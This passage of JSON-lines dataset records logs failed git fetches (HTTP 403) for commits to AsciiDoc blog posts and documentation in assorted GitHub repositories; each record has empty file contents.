@AuthenticationPrincipal\n","repos":"adairtaosy\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,ajdinhedzic\/spring-security,olezhuravlev\/spring-security,vitorgv\/spring-security,mounb\/spring-security,ollie314\/spring-security,caiwenshu\/spring-security,rwinch\/spring-security,adairtaosy\/spring-security,xingguang2013\/spring-security,xingguang2013\/spring-security,forestqqqq\/spring-security,ractive\/spring-security,tekul\/spring-security,Xcorpio\/spring-security,vitorgv\/spring-security,kazuki43zoo\/spring-security,tekul\/spring-security,jgrandja\/spring-security,adairtaosy\/spring-security,thomasdarimont\/spring-security,caiwenshu\/spring-security,panchenko\/spring-security,spring-projects\/spring-security,likaiwalkman\/spring-security,xingguang2013\/spring-security,ajdinhedzic\/spring-security,panchenko\/spring-security,likaiwalkman\/spring-security,MatthiasWinzeler\/spring-security,pkdevbox\/spring-security,ollie314\/spring-security,wilkinsona\/spring-security,eddumelendez\/spring-security,zgscwjm\/spring-security,SanjayUser\/SpringSecurityPro,wilkinsona\/spring-security,thomasdarimont\/spring-security,Peter32\/spring-security,raindev\/spring-security,mounb\/spring-security,tekul\/spring-security,zshift\/spring-security,hippostar\/spring-security,Krasnyanskiy\/spring-security,zgscwjm\/spring-security,wilkinsona\/spring-security,vitorgv\/spring-security,eddumelendez\/spring-security,forestqqqq\/spring-security,jmnarloch\/spring-security,ollie314\/spring-security,jgrandja\/spring-security,wkorando\/spring-security,kazuki43zoo\/spring-security,jmnarloch\/spring-security,hippostar\/spring-security,thomasdarimont\/spring-security,zshift\/spring-security,fhanik\/spring-security,cyratech\/spring-security,rwinch\/spring-security,zgscwjm\/spring-security,MatthiasWinzeler\/spring-security,thomasdarimont\/spring-security,izeye\/spring-security,fhanik\/spring-security,hippostar\/spring-security,jmnarloch\/spring-security,eddumelendez\/spring-security,chinazhaoht\/spring-security,forestqqqq\/spring-security,forestqqqq\/spring-security,spring-projects\/spring-security,panchenko\/spring-security,djechelon\/spring-security,pwheel\/spring-security,tekul\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,kazuki43zoo\/spring-security,spring-projects\/spring-security,SanjayUser\/SpringSecurityPro,jgrandja\/spring-security,mounb\/spring-security,ractive\/spring-security,djechelon\/spring-security,liuguohua\/spring-security,ractive\/spring-security,fhanik\/spring-security,zshift\/spring-security,Peter32\/spring-security,mrkingybc\/spring-security,mounb\/spring-security,mdeinum\/spring-security,SanjayUser\/SpringSecurityPro,follow99\/spring-security,eddumelendez\/spring-security,spring-projects\/spring-security,MatthiasWinzeler\/spring-security,cyratech\/spring-security,liuguohua\/spring-security,wilkinsona\/spring-security,wkorando\/spring-security,diegofernandes\/spring-security,likaiwalkman\/spring-security,caiwenshu\/spring-security,izeye\/spring-security,Xcorpio\/spring-security,wkorando\/spring-security,chinazhaoht\/spring-security,follow99\/spring-security,vitorgv\/spring-security,mdeinum\/spring-security,izeye\/spring-security,zhaoqin102\/spring-security,jmnarloch\/spring-security,driftman\/spring-security,caiwenshu\/spring-security,Krasnyanskiy\/spring-security,Xcorpio\/spring-security,olezhuravlev\/spring-security,panchenko\/spring-security,pwheel\/spring-security,driftman\/spring-security,fhanik\/spring-security,chinazhaoht\/spring-security,SanjayUser\/SpringSecurityPro,mrkingybc\/spring-security,olezhuravlev\/spring-security,pwheel\/spring-security,mrkingybc\/spring-security,yinhe402\/spring-security,raindev\/spring-security,Krasnyanskiy\/spring-security,Krasnyanskiy\/spring-security,pwheel\/spring-security,Xcorpio\/spring-security,Peter32\/spring-security,zhaoqin102\/spring-security,mdeinum\/spring-security,djechelon\/spring-security,zhaoqin102\/spring-security,yinhe402\/spring-security,olezhuravlev\/spring-security,zhaoqin102\/spring-security,follow99\/spring-security,mparaz\/spring-security,ractive\/spring-security,cyratech\/spring-security,liuguohua\/spring-security,rwinch\/spring-security,mrkingybc\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,kazuki43zoo\/spring-security,thomasdarimont\/spring-security,zgscwjm\/spring-security,ollie314\/spring-security,diegofernandes\/spring-security,mdeinum\/spring-security,cyratech\/spring-security,pkdevbox\/spring-security,yinhe402\/spring-security,pkdevbox\/spring-security,mparaz\/spring-security,likaiwalkman\/spring-security,ajdinhedzic\/spring-security,raindev\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,izeye\/spring-security,driftman\/spring-security,mparaz\/spring-security,chinazhaoht\/spring-security,eddumelendez\/spring-security,zshift\/spring-security,MatthiasWinzeler\/spring-security,liuguohua\/spring-security,ajdinhedzic\/spring-security,xingguang2013\/spring-security,fhanik\/spring-security,djechelon\/spring-security,pwheel\/spring-security,pkdevbox\/spring-security,driftman\/spring-security,kazuki43zoo\/spring-security,adairtaosy\/spring-security,mparaz\/spring-security,wkorando\/spring-security,olezhuravlev\/spring-security,yinhe402\/spring-security,Peter32\/spring-security,fhanik\/spring-security,follow99\/spring-security,SanjayUser\/SpringSecurityPro,raindev\/spring-security,hippostar\/spring-security,diegofernandes\/spring-security,rwinch\/spring-security,diegofernandes\/spring-security","old_file":"docs\/manual\/src\/asciidoctor\/index.adoc","new_file":"docs\/manual\/src\/asciidoctor\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"839eca22fcd5b4412341ae90c56f947438bc99ff","subject":"Update 2011-01-13-Getting-MAX-or-MIN-values-in-CakePHP.adoc","message":"Update 2011-01-13-Getting-MAX-or-MIN-values-in-CakePHP.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2011-01-13-Getting-MAX-or-MIN-values-in-CakePHP.adoc","new_file":"_posts\/2011-01-13-Getting-MAX-or-MIN-values-in-CakePHP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"811e24372da6a428bf3f372d07e948b0a63fa6da","subject":"Update 2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","message":"Update 2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","new_file":"_posts\/2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"121d5cfd7f21383ce4cbe1ebc53cd1435ee5b3c1","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"604975d2c1c86ecb48945e318703e60fc351bcd7","subject":"Updated docs links to point to master branches","message":"Updated docs links to point to master branches\n\nOriginal commit: elastic\/x-pack-elasticsearch@2f15df4847cf249a01061ad20f6cf21254cb4808\n","repos":"HonzaKral\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,vroyer\/elassandra,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,coding0011\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,uschindler\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,coding0011\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch","old_file":"watcher\/docs\/index.asciidoc","new_file":"watcher\/docs\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7cb0cac3c0e3acb02ed3de2d3a8bb7967b5fbde6","subject":"PLANNER-832: Write a blog post about OptaPlanner Workbench xor Execution Server","message":"PLANNER-832: Write a blog post about OptaPlanner Workbench xor Execution Server\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"blog\/2017-08-18-OptimizeYourProblemsUsingKieServerPart.adoc","new_file":"blog\/2017-08-18-OptimizeYourProblemsUsingKieServerPart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/droolsjbpm\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f5dc5b729a4ed488a52a9b60db6af09a0f012e26","subject":"y2b create post Unboxing The $3000 Rolling Headphones","message":"y2b create post Unboxing The $3000 Rolling Headphones","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-08-Unboxing-The-3000-Rolling-Headphones.adoc","new_file":"_posts\/2017-08-08-Unboxing-The-3000-Rolling-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7ede17b1893bad0bc7aa1c00829357f061d7dd9","subject":"Add missing docs","message":"Add missing docs\n","repos":"zregvart\/camel,adessaigne\/camel,CodeSmell\/camel,ullgren\/camel,ullgren\/camel,objectiser\/camel,apache\/camel,ullgren\/camel,gnodet\/camel,mcollovati\/camel,apache\/camel,nicolaferraro\/camel,tdiesler\/camel,objectiser\/camel,apache\/camel,zregvart\/camel,cunningt\/camel,zregvart\/camel,adessaigne\/camel,tadayosi\/camel,christophd\/camel,pmoerenhout\/camel,nicolaferraro\/camel,cunningt\/camel,adessaigne\/camel,cunningt\/camel,tdiesler\/camel,pax95\/camel,tdiesler\/camel,DariusX\/camel,tadayosi\/camel,apache\/camel,pax95\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,cunningt\/camel,tadayosi\/camel,gnodet\/camel,gnodet\/camel,pmoerenhout\/camel,tdiesler\/camel,tadayosi\/camel,ullgren\/camel,alvinkwekel\/camel,CodeSmell\/camel,pax95\/camel,alvinkwekel\/camel,tadayosi\/camel,pax95\/camel,zregvart\/camel,pax95\/camel,mcollovati\/camel,nikhilvibhav\/camel,DariusX\/camel,christophd\/camel,objectiser\/camel,alvinkwekel\/camel,cunningt\/camel,christophd\/camel,nikhilvibhav\/camel,christophd\/camel,gnodet\/camel,tdiesler\/camel,christophd\/camel,pmoerenhout\/camel,gnodet\/camel,adessaigne\/camel,tdiesler\/camel,nicolaferraro\/camel,mcollovati\/camel,adessaigne\/camel,alvinkwekel\/camel,mcollovati\/camel,pmoerenhout\/camel,DariusX\/camel,christophd\/camel,objectiser\/camel,apache\/camel,nicolaferraro\/camel,pmoerenhout\/camel,CodeSmell\/camel,apache\/camel,CodeSmell\/camel,adessaigne\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,DariusX\/camel","old_file":"components\/camel-attachments\/src\/main\/docs\/attachments.adoc","new_file":"components\/camel-attachments\/src\/main\/docs\/attachments.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2e7880a978f6c399f9d0b45bcc732055f171305a","subject":"Add release notes 5.1.0-M2 document","message":"Add release notes 5.1.0-M2 document\n","repos":"junit-team\/junit-lambda,sbrannen\/junit-lambda","old_file":"documentation\/src\/docs\/asciidoc\/release-notes-5.1.0-M2.adoc","new_file":"documentation\/src\/docs\/asciidoc\/release-notes-5.1.0-M2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sbrannen\/junit-lambda.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"65a12d21f95faeefebcc28aa807f765111c99052","subject":"Adding feedback on standalone alert component","message":"Adding feedback on standalone alert component\n","repos":"lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,lzoubek\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,lzoubek\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/alerts\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/alerts\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"31198bf2ee8b343feb074e3d85a4e85d98d2c42b","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d6d8a46347eadf2261425cd14aefb6a7b3f2bdf","subject":"update Readme","message":"update Readme\n","repos":"cranej\/scripts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cranej\/scripts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90bf7cf1311400302d6bc52ebef8f23949d1641c","subject":"Create README.adoc","message":"Create README.adoc","repos":"nithril\/YaPetStore,nithril\/YaPetStore,nithril\/YaPetStore","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nithril\/YaPetStore.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef024816328c9a0bf55ea89bc3728057fc69883d","subject":"Developer guide moved","message":"Developer guide moved","repos":"jsanda\/hawkular-alerts,lucasponce\/hawkular-alerts,lucasponce\/hawkular-alerts,jpkrohling\/hawkular-alerts,jpkrohling\/hawkular-alerts,hawkular\/hawkular-alerts,lucasponce\/hawkular-alerts,lucasponce\/hawkular-alerts,jsanda\/hawkular-alerts,hawkular\/hawkular-alerts,hawkular\/hawkular-alerts,hawkular\/hawkular-alerts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular-alerts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"748b171f32e19d793929fa28b1b6e560388c9d83","subject":"Create README.adoc","message":"Create README.adoc","repos":"adoc-editor\/documentation","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/documentation.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"687f734753d9a6bf855d20aba639c80adbd3cd6e","subject":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","message":"Update 2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_file":"_posts\/2014-01-18-Ruckblick-auf-den-7-Linux-Informationstag-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"592d2f90cf04edcea742e202fc0f1d0d681ec50c","subject":"Update 2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","message":"Update 2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","new_file":"_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"526047331101ac5dffa4cee13bbbb6f1c149e8eb","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fa9ef76623098bcff0943b38afeed8afd5540a8","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"382caa9f1af2fa6d9c2fb28b813d5cdd4f23e4f8","subject":"Update 2016-07-18-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-18-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-18-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-18-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27347040bf6fb5f5ab53118b1e8b4537bbef9874","subject":"Added a readme","message":"Added a readme\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"93917baac15fc87c8880fd9b2c532d63849d3b18","subject":"Update 2017-08-05-mecab.adoc","message":"Update 2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f71387adf49d495b28e0662d531346e381a0a31","subject":"Update 2018-04-02-earth.adoc","message":"Update 2018-04-02-earth.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-04-02-earth.adoc","new_file":"_posts\/2018-04-02-earth.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8e81e0d5fd93641cc3da5ab3ad656b592710259","subject":"y2b create post New Nexus 7 Unboxing \\u0026 First Look! (Google Nexus 7 2013)","message":"y2b create post New Nexus 7 Unboxing \\u0026 First Look! (Google Nexus 7 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-27-New-Nexus-7-Unboxing-u0026-First-Look-Google-Nexus-7-2013.adoc","new_file":"_posts\/2013-07-27-New-Nexus-7-Unboxing-u0026-First-Look-Google-Nexus-7-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e26a2265ebfed21f6c460815facb8b3dd73d728","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8faec37c57561b935fb06e80741edb99253b4152","subject":"Update 2018-01-27-Lets-try-this-again-Also-Animoji-dogs.adoc","message":"Update 2018-01-27-Lets-try-this-again-Also-Animoji-dogs.adoc","repos":"laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io,laposheureux\/laposheureux.github.io","old_file":"_posts\/2018-01-27-Lets-try-this-again-Also-Animoji-dogs.adoc","new_file":"_posts\/2018-01-27-Lets-try-this-again-Also-Animoji-dogs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laposheureux\/laposheureux.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32c5d0d891cd32767204ac66deebd14217635992","subject":"Update 2016-04-16-Installing-Debian-on-the-Mac-Book-Air.adoc","message":"Update 2016-04-16-Installing-Debian-on-the-Mac-Book-Air.adoc","repos":"pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io","old_file":"_posts\/2016-04-16-Installing-Debian-on-the-Mac-Book-Air.adoc","new_file":"_posts\/2016-04-16-Installing-Debian-on-the-Mac-Book-Air.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pyxozjhi\/pyxozjhi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb61a0228eb788616e9370fdc70184750b9061f6","subject":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","message":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6ffb8a78507661d8e7b2d254dd99d62433bd18a","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6619abe41e1223a52982e35e9c3616673c4e5b9","subject":"y2b create post AlcoHawk Digital Alcohol Detector (Pocket Breathalyzer)","message":"y2b create post AlcoHawk Digital Alcohol Detector (Pocket Breathalyzer)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-19-AlcoHawk-Digital-Alcohol-Detector-Pocket-Breathalyzer.adoc","new_file":"_posts\/2011-12-19-AlcoHawk-Digital-Alcohol-Detector-Pocket-Breathalyzer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b17bcb89e471960b1e082be2b4fa745f3b30cb70","subject":"Update 2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","message":"Update 2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","new_file":"_posts\/2016-04-14-Introduccion-a-la-seguridad-fisica.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 